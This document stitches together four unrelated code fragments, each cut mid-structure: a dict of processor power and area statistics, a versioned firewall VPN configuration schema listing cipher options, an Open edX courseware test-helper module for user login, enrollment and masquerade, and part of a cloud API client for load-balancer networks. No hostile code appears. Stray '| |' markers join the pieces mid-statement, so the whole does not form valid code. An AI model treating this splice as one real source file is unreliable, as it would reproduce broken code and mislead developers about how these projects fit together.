'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000865114,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000776767,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00756691,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0194391,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.051982,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.30651,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.175856,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.176554,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.68549,
'Instruction Fetch Unit/Runtime Dynamic': 0.431399,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00567966,
'L2/Runtime Dynamic': 0.00181095,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.49482,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.606984,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0406895,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0406894,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.68696,
'Load Store Unit/Runtime Dynamic': 0.848339,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.100333,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.200666,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0356086,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0356682,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.205586,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0289046,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.422865,
'Memory Management Unit/Runtime Dynamic': 0.0645729,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.6035,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00786459,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0889693,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': | |
"value": "aes256gcm-prfsha256",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aes256gcm-prfsha384",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aes256gcm-prfsha512",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "chacha20poly1305-prfsha1",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "chacha20poly1305-prfsha256",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "chacha20poly1305-prfsha384",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "chacha20poly1305-prfsha512",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria128-md5",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria128-sha1",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria128-sha256",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria128-sha384",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria128-sha512",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria192-md5",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria192-sha1",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria192-sha256",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria192-sha384",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria192-sha512",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria256-md5",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria256-sha1",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria256-sha256",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria256-sha384",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "aria256-sha512",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "seed-md5",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "seed-sha1",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "seed-sha256",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "seed-sha384",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "seed-sha512",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"type": {
"type": "string",
"options": [
{
"value": "static",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "dynamic",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "ddns",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"authusrgrp": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"reauth": {
"type": "string",
"options": [
{
"value": "disable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "enable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"ipv4_dns_server3": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"ipv4_exclude_range": {
"type": "list",
"children": {
"start_ip": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"end_ip": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"id": {
"type": "integer",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
},
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": | |
<gh_stars>1-10
"""
Helpers for courseware tests.
"""
import ast
import json
from collections import OrderedDict
from datetime import timedelta
from django.contrib import messages
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.test import TestCase
from django.test.client import Client, RequestFactory
from django.urls import reverse
from django.utils.timezone import now
from xblock.field_data import DictFieldData
from common.djangoapps.edxmako.shortcuts import render_to_string
from lms.djangoapps.courseware.access import has_access
from lms.djangoapps.courseware.utils import verified_upgrade_deadline_link
from lms.djangoapps.courseware.masquerade import MasqueradeView
from lms.djangoapps.courseware.masquerade import setup_masquerade
from lms.djangoapps.lms_xblock.field_data import LmsFieldData
from openedx.core.djangoapps.content.course_overviews.models import CourseOverview
from openedx.core.lib.url_utils import quote_slashes
from common.djangoapps.student.models import CourseEnrollment, Registration
from common.djangoapps.student.tests.factories import CourseEnrollmentFactory, UserFactory
from common.djangoapps.util.date_utils import strftime_localized_html
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.tests.django_utils import TEST_DATA_MONGO_MODULESTORE, ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from xmodule.tests import get_test_descriptor_system, get_test_system
class BaseTestXmodule(ModuleStoreTestCase):
"""Base class for testing Xmodules with mongo store.
This class prepares course and users for tests:
1. create test course;
2. create, enroll and login users for this course;
Any xmodule should overwrite only next parameters for test:
1. CATEGORY
2. DATA or METADATA
3. MODEL_DATA
4. COURSE_DATA and USER_COUNT if needed
This class should not contain any tests, because CATEGORY
should be defined in child class.
"""
MODULESTORE = TEST_DATA_MONGO_MODULESTORE
USER_COUNT = 2
COURSE_DATA = {}
# Data from YAML common/lib/xmodule/xmodule/templates/NAME/default.yaml
CATEGORY = "vertical"
DATA = ''
# METADATA must be overwritten for every instance that uses it. Otherwise,
# if we'll change it in the tests, it will be changed for all other instances
# of parent class.
METADATA = {}
MODEL_DATA = {'data': '<some_module></some_module>'}
def new_module_runtime(self):
"""
Generate a new ModuleSystem that is minimally set up for testing
"""
return get_test_system(course_id=self.course.id)
def new_descriptor_runtime(self):
runtime = get_test_descriptor_system()
runtime.get_block = modulestore().get_item
return runtime
def initialize_module(self, **kwargs): # lint-amnesty, pylint: disable=missing-function-docstring
kwargs.update({
'parent_location': self.section.location,
'category': self.CATEGORY
})
self.item_descriptor = ItemFactory.create(**kwargs)
self.runtime = self.new_descriptor_runtime()
field_data = {}
field_data.update(self.MODEL_DATA)
student_data = DictFieldData(field_data)
self.item_descriptor._field_data = LmsFieldData(self.item_descriptor._field_data, student_data) # lint-amnesty, pylint: disable=protected-access
self.item_descriptor.xmodule_runtime = self.new_module_runtime()
self.item_url = str(self.item_descriptor.location)
def setup_course(self): # lint-amnesty, pylint: disable=missing-function-docstring
self.course = CourseFactory.create(data=self.COURSE_DATA)
# Turn off cache.
modulestore().request_cache = None
modulestore().metadata_inheritance_cache_subsystem = None
chapter = ItemFactory.create(
parent_location=self.course.location,
category="sequential",
)
self.section = ItemFactory.create(
parent_location=chapter.location,
category="sequential"
)
# username = robot{0}, password = '<PASSWORD>'
self.users = [
UserFactory.create()
for dummy0 in range(self.USER_COUNT)
]
for user in self.users:
CourseEnrollmentFactory.create(user=user, course_id=self.course.id)
# login all users for acces to Xmodule
self.clients = {user.username: Client() for user in self.users}
self.login_statuses = [
self.clients[user.username].login(
username=user.username, password='<PASSWORD>')
for user in self.users
]
assert all(self.login_statuses)
def setUp(self):
super().setUp()
self.setup_course()
self.initialize_module(metadata=self.METADATA, data=self.DATA)
def get_url(self, dispatch):
"""Return item url with dispatch."""
return reverse(
'xblock_handler',
args=(str(self.course.id), quote_slashes(self.item_url), 'xmodule_handler', dispatch)
)
class XModuleRenderingTestBase(BaseTestXmodule): # lint-amnesty, pylint: disable=missing-class-docstring
def new_module_runtime(self):
"""
Create a runtime that actually does html rendering
"""
runtime = super().new_module_runtime()
runtime.render_template = render_to_string
return runtime
class LoginEnrollmentTestCase(TestCase):
"""
Provides support for user creation,
activation, login, and course enrollment.
"""
user = None
def setup_user(self):
"""
Create a user account, activate, and log in.
"""
self.email = '<EMAIL>' # lint-amnesty, pylint: disable=attribute-defined-outside-init
self.password = '<PASSWORD>' # lint-amnesty, pylint: disable=attribute-defined-outside-init
self.username = 'test' # lint-amnesty, pylint: disable=attribute-defined-outside-init
self.user = self.create_account(
self.username,
self.email,
self.password,
)
# activate_user re-fetches and returns the activated user record
self.user = self.activate_user(self.email)
self.login(self.email, self.password)
def assert_request_status_code(self, status_code, url, method="GET", **kwargs):
"""
Make a request to the specified URL and verify that it returns the
expected status code.
"""
make_request = getattr(self.client, method.lower())
response = make_request(url, **kwargs)
assert response.status_code == status_code, f'{method} request to {url} returned status code {response.status_code}, expected status code {status_code}' # pylint: disable=line-too-long
return response
def assert_account_activated(self, url, method="GET", **kwargs): # lint-amnesty, pylint: disable=missing-function-docstring
make_request = getattr(self.client, method.lower())
response = make_request(url, **kwargs)
message_list = list(messages.get_messages(response.wsgi_request))
assert len(message_list) == 1
assert 'success' in message_list[0].tags
assert 'You have activated your account.' in message_list[0].message
# ============ User creation and login ==============
def login(self, email, password):
"""
Login, check that the corresponding view's response has a 200 status code.
"""
resp = self.client.post(reverse('user_api_login_session', kwargs={'api_version': 'v1'}),
{'email': email, 'password': password})
assert resp.status_code == 200
def logout(self):
"""
Logout; check that the HTTP response code indicates redirection
as expected.
"""
self.assert_request_status_code(200, reverse('logout'))
def create_account(self, username, email, password):
"""
Create the account and check that it worked.
"""
url = reverse('user_api_registration')
request_data = {
'username': username,
'email': email,
'password': password,
'name': 'username',
'terms_of_service': 'true',
'honor_code': 'true',
}
self.assert_request_status_code(200, url, method="POST", data=request_data)
# Check both that the user is created, and inactive
user = User.objects.get(email=email)
assert not user.is_active
return user
def activate_user(self, email):
"""
Look up the activation key for the user, then hit the activate view.
No error checking.
"""
activation_key = Registration.objects.get(user__email=email).activation_key
# and now we try to activate
url = reverse('activate', kwargs={'key': activation_key})
self.assert_account_activated(url)
# Now make sure that the user is now actually activated
user = User.objects.get(email=email)
assert user.is_active
# And return the user we fetched.
return user
def enroll(self, course, verify=False):
"""
Try to enroll and return boolean indicating result.
`course` is an instance of CourseBlock.
`verify` is an optional boolean parameter specifying whether we
want to verify that the student was successfully enrolled
in the course.
"""
resp = self.client.post(reverse('change_enrollment'), {
'enrollment_action': 'enroll',
'course_id': str(course.id),
'check_access': True,
})
result = resp.status_code == 200
if verify:
assert result
return result
def unenroll(self, course):
"""
Unenroll the currently logged-in user, and check that it worked.
`course` is an instance of CourseBlock.
"""
url = reverse('change_enrollment')
request_data = {
'enrollment_action': 'unenroll',
'course_id': str(course.id),
}
self.assert_request_status_code(200, url, method="POST", data=request_data)
class CourseAccessTestMixin(TestCase):
"""
Utility mixin for asserting access (or lack thereof) to courses.
If relevant, also checks access for courses' corresponding CourseOverviews.
"""
def assertCanAccessCourse(self, user, action, course):
"""
Assert that a user has access to the given action for a given course.
Test with both the given course and with a CourseOverview of the given
course.
Arguments:
user (User): a user.
action (str): type of access to test.
course (CourseBlock): a course.
"""
assert has_access(user, action, course)
assert has_access(user, action, CourseOverview.get_from_id(course.id))
def assertCannotAccessCourse(self, user, action, course):
"""
Assert that a user lacks access to the given action the given course.
Test with both the given course and with a CourseOverview of the given
course.
Arguments:
user (User): a user.
action (str): type of access to test.
course (CourseBlock): a course.
Note:
It may seem redundant to have one method for testing access
and another method for testing lack thereof (why not just combine
them into one method with a boolean flag?), but it makes reading
stack traces of failed tests easier to understand at a glance.
"""
assert not has_access(user, action, course)
assert not has_access(user, action, CourseOverview.get_from_id(course.id))
class MasqueradeMixin:
"""
Adds masquerade utilities for your TestCase.
Your test case class must have self.client. And can optionally have self.course if you don't want
to pass in the course parameter below.
"""
def update_masquerade(self, course=None, role='student', group_id=None, username=None, user_partition_id=None):
"""
Installs a masquerade for the specified user and course, to enable
the user to masquerade as belonging to the specific partition/group
combination.
Arguments:
course (object): a course or None for self.course
user_partition_id (int): the integer partition id, referring to partitions already
configured in the course.
group_id (int); the integer group id, within the specified partition.
username (str): user to masquerade as
role (str): role to masquerade as
Returns: the response object for the AJAX call to update the user's masquerade.
"""
course = course or self.course
masquerade_url = reverse(
'masquerade_update',
kwargs={
'course_key_string': str(course.id),
}
)
response = self.client.post(
masquerade_url,
json.dumps({
'role': role,
'group_id': group_id,
'user_name': username,
'user_partition_id': user_partition_id,
}),
'application/json'
)
assert response.status_code == 200
assert response.json()['success'], response.json().get('error')
return response
def masquerade_as_group_member(user, course, partition_id, group_id):
"""
Installs a masquerade for the specified user and course, to enable
the user to masquerade as belonging to the specific partition/group
combination.
Arguments:
user (User): a user.
course (CourseBlock): a course.
partition_id (int): the integer partition id, referring to partitions already
configured in the course.
group_id (int); the integer group id, within the specified partition.
Returns: the status code for the AJAX response to update the user's masquerade for
the specified course.
"""
request = _create_mock_json_request(
user,
data={"role": "student", "user_partition_id": partition_id, "group_id": group_id}
)
response | |
List by keyword
page -
pagesize -
page - Pagination
'''
if 'lbdeviceid' not in args:
raise RuntimeError("Missing required argument 'lbdeviceid'")
return self.request('listSrxFirewallNetworks', args)
def listNetscalerLoadBalancerNetworks(self, args={}):
'''
lists network that are using a netscaler load balancer device
args - A dictionary. The following are options for keys:
lbdeviceid - netscaler load balancer device ID
keyword - List by keyword
page -
pagesize -
page - Pagination
'''
if 'lbdeviceid' not in args:
raise RuntimeError("Missing required argument 'lbdeviceid'")
return self.request('listNetscalerLoadBalancerNetworks', args)
def createLoadBalancer(self, args={}):
'''
Create a load-balancer instance
